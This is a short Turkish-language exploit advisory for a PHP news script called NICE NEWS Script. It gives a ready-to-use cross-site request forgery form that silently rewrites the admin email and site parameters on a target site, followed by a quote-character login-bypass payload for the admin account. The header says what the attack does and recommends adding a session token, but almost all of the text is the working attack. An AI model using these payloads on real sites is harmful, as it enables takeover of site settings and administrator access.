< ------------------- header data start ------------------- >

#############################################################

# Application Name : NICE NEWS Script

# vulnerable Type : XSRF ~ Login Bypass

# Infection : yapilandirma ayarlari degistirilip yönlendirme yapilabilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Demo : http://www.nicephpscripts.com/scripts/news_script/

# author : CWCaspeR ~ Bug Researchers Grup.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

[XSRF]
<form name=form2 method=post action=http://www.hedefsite.com/scriptyolu/admin/update_site_parameters.php onSubmit=return validate(this);>
<input name=nc_item_text type=hidden id=nc_item_text value=News>
<input name=nc_item_plutext type=hidden id=nc_item_plutext value=News>
<input name=adminemail type=hidden class=box1 id=adminemail value=[email protected] size=35 >
<input name=sitename type=hidden class=box1 id=sitename value=YONLENDIRME KODU size=35>
<input name=siteaddrs type=hidden class=box1 id=siteaddrs value=http://www.nicephpscripts.com/scripts/news_script size=35>
<input name=ashtml type=hidden id=ashtml value=1checked>
<input name=item_ext type=hidden id=item_ext value=htm>
<input name=Submit type=submit class=btn value=Buton Adi><input name=cat_ext type=hidden id=cat_ext value=><input name=item_dir type=hidden id=item_dir value= >
</form>

[Login Bypass]
Login : Admin
password : ’

< -- bug code end of -- >